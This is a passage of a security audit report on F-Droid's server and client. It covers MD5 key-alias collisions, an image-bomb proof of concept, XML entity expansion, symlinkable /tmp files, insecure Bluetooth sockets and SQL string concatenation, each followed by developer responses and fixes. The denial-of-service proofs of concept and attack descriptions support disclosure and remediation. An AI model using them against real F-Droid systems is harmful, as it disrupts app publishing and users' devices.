level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">By submitting an app to fdroid with a crafted appid it is possible to deny the publishing of new apps to fdroid.</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The function key_alias() calculates the key_alias from the appid by hashing it with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">MD5</span> and taking the first 8 digits of the hex representation of this hash: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">md5.hexlify()[:8]</span>. This is 32bits, but due to the birthday paradox collisions are reasonably cheap to calculate.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In the main() function there is a check for collisions of key aliases, if there is any, the publish script aborts. There is a comment refering to a previous audit stating that chances are neglible of encountering a collision.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">We produced two PoC scripts, both use as input an english wordlist (taken from debian /usr/share/dict/words) removing all lines that end in "'s", resulting in a list with 73333 english words.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In PoC-1 (collidemd5-4.py) we generate random english words into appids as long as there is no collision. After approximately 9000 samples we find that it takes about 113.930 random appids until there is a collision.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">In PoC-2 we adjust our sampling by taking into account that there are currently about 1500 apps in fdroid, and we try to create a collision with one of these 1500 items. After 1355 samples it takes an average 2.925.625 attempts to collide with one of the 1500 target hashes.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">This shows it is feasible to create a collision and create a DoS against the publishing process.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Notable also is that the key_alias() function does allow for overriding the key alias, but the check in the main() function does not take that into account.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">publish.py:186 (main())):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"># It was suggested at
# https://dev.guardianproject.info/projects/bazaar/wiki/FDroid_Audit
# that a package could be crafted, such that it would use the same signing
# key as an existing app. While it may be theoretically possible for such a
# colliding package ID to be generated, it seems virtually impossible that
# the colliding ID would be something that would be a) a valid package ID,
# and b) a sane-looking ID that would make its way into the repo.
# Nonetheless, to be sure, before publishing we check that there are no
# collisions, and refuse to do any publishing if that's the case...
allapps = metadata.read_metadata()
vercodes = common.read_pkg_args(options.appid, True)
allaliases = []
for appid in allapps:
m = hashlib.md5()
m.update(appid.encode('utf-8'))
keyalias = m.hexdigest()[:8]
if keyalias in allaliases:
logging.error(_("There is a keyalias collision - publishing halted"))
sys.exit(1)
allaliases.append(keyalias)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Denial of Service</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Either use longer ids, or don't make the ids depending on user input.</div></div>
</div>
<a name="f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.13</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-013 — Image Bomb Can Lead to DoS in Fdroidserver:update.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-013</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Maliciously crafted images can lead to resource exhaustion in fdroidserver.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">A crafted image can fill up the RAM and harddisk of fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_strip_and_copy_image()</span> (<span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">resize_icon()</span> might also be affected)</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">fdroidserver/update.py:709</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">with open(inpath, 'rb') as fp:
in_image = Image.open(fp)
data = list(in_image.getdata())
out_image = Image.new(in_image.mode, in_image.size)
out_image.putdata(data)
out_image.save(outpath, "JPEG", optimize=True)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">PoC to be used with attached lottapixels.jpg (expect your RAM to be exhausted and lotsa swapping):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">from PIL import Image
with open('lottapixel.jpg', 'rb') as fp:
in_image = Image.open(fp)
data = list(in_image.getdata())
out_image = Image.new(in_image.mode, in_image.size)
out_image.putdata(data)
out_image.save("exploded.jpg", "JPEG", optimize=True)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Resource exhaustion on fdroid</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Check for size of images before processing, set ulimit and disk quota.</div></div>
</div>
<a name="f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.14</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-014 — Insecure Usage of Temporary File/Directory in Fdroidserver Docker/drozer.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-014</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Insecure usage of temporary files can allow an attacker to cause a Denial of Service by linking to an important file and have it overwritten.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">A predictable filename is used to write in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">/tmp</span>.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from docker/drozer.py:10</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">drozer = pexpect.spawn("drozer console connect")
drozer.logfile = open("/tmp/drozer_report.log", "w")</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">An adversary could create a symlink and make the export script overwrite some important file, causing a denial of service.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Difficult to trigger, but depending on file overwritten could be expensive</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Generate export files in a dedicated folder with restrictive access permissions.</div></div>
</div>
<a name="f20-parsing-untrusted-xml-data-in-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.15</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-015 — Parsing Untrusted XML Data in Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-015</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">XML file parsing can be used to exhaust resources (RAM) when entity parsing is abused for the Billion Laughs and Quadratic Blowup attacks. In fdroidserver there is a couple of places where such can happen.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Fdroidserver uses the python modules <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.dom.minidom</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.etree.ElementTree</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">lxml</span>. All of these are vulnerable to both "quadratic blowup" and "billion laughs" attacks.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">see more info: <a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities" style="color: #e2632a;">https://docs.python.org/3/library/xml.html#xml-vulnerabilities</a></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Affected files:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/btlog.py:97
doc = xml.dom.minidom.parse(repof)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/common.py:2940
return XMLElementTree.parse(path).getroot()</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/server.py:453
tree = fromstring(response)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Availability can be restricted due to Denial of Service attacks</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Replace these with its defusedxml equivalent function or - only applicable to xml.* modules - make sure defusedxml.defuse_stdlib() is called.</div></div>
</div>
<a name="f30-downloader-download-file-type-and-size-are-not-verified"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.16</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-016 — Missing file type and size validation </div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-016</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Arbitrary file download</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"> <div style="margin-bottom: 5pt; line-height: 6mm;"> Download File Type and Size Are Not Verified </div> </div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Affected files are Files <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">net/BluetoothDownloader.java</span> and other derived classes in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">localFileDownloader.java</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">httpDownLoader.java</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">imageDownLoader.Java</span>, and its super class <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">Downloader.java</span></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The download activity using WiFi or Bluetooth downloader classes does not check for type of file, or file size. This is intended for apk file sharing between trusted devices.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Developer comments:</span> The install process requires that the hash of the received file matches that in the signed <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">index.jar</span>. So for the exploit to install a malicious APK, the index.jar must also be compromised. The fdroid install process first validates the sha256 against what is in the signed _index.jar_, so after the download process, all files are verified the download process puts the files into a private dir, so the user cannot install them manually after download, only via _fdroidclient</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Arbitrary, potentially malicious, file can be downloaded into an unsuspecting user's device. This may allow an attacker to activate a different exploit vector.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Only allow certain types of files to be transmitted (whitelisting) if possible.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Limit the size of file to be transmitted, and warn the user for large files.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">The issue should be fixed in the parent class, and the subclasses should perform some content type check, to avoid malicious file/app installation on the victim device.</div>
</div>
</div>
<a name="f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.17</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-017 — Use of Insecure Communication Mechanism - BluetoothClient.java</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-017</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure communication</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothClient.java</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothClient.java, Bluetooth device creates an insecure RFComm socket. This type of connection is vulnerable to MiTM attacks, as the line key is not encrypted.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 29: socket = device.createInsecureRfcommSocketToServiceRecord(BluetoothConstants.fdroidUuid());</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Reference: <a href="https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)" style="color: #e2632a;">https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)</a></div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Developer response:</span> Ideally, F-Droid would always use encrypted connections, but with the p2p we have found that it made it a lot harder to make the exchange. We rely on a TOFUed signing key on the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">index.jar</span> to provide the integrity check. We went with unencrypted HTTP and Bluetooth to increase the likelihood that things would work.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">ROS response:</span> Sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices. </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Integrity of communication is compromised, leading to arbitrary app installation and device compromise.
</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.
</div>
</div>
</div>
<a name="f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.18</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-018 — Use of Insecure Communication Mechanism - BluetoothServer.java</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-018</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure communication</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothServer.java</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothServer.java, Bluetooth device creates an insecure RFComm socket. This type of connection is vulnerable to MiTM attacks, as the line key is not encrypted.
</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
Line 72:
serverSocket =
adapter.listenUsingInsecureRfcommWithServiceRecord("FDroid App Swap",
BluetoothConstants.fdroidUuid());
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Reference: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)</span>
</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Integrity of communication is compromised, leading to arbitrary app installation and device compromise.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.
</div>
</div>
</div>
<a name="f35-potential-sql-injection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.19</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-019 — Potential SQL Injection</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-019</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>SQL Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Concatenation of strings, some of which are under attacker c.ontrol, is used to form DB queries.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Several functions in data subdirectory code use string concatenated query building to do DB operations on package name and other package supplied or repo supplied parameters.
</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">data/QueryBuilder.java: Lines 67-75 and lines 168-172
data/AppProvider.java: Lines 268, 700, 737, 922, 1058, 1081, 1132, 1178
data/TempApkProvider.java: Line 107
data/ApkProvider.java: Lines 315, 470,
data/FdroidProvider.java: Line 146
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer: </span> yeah, these should be tightened so we don't have to trust the server.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Corruption in device based DB leading to device compromise</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Use prepared statements for DB query preparation.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate the strings with white listing before using in SQL query.</div>
</div>
</div>
<a name="f41-app-uses-data-from-clipboard"></a><div style="margin-bottom: 1.3cm;">
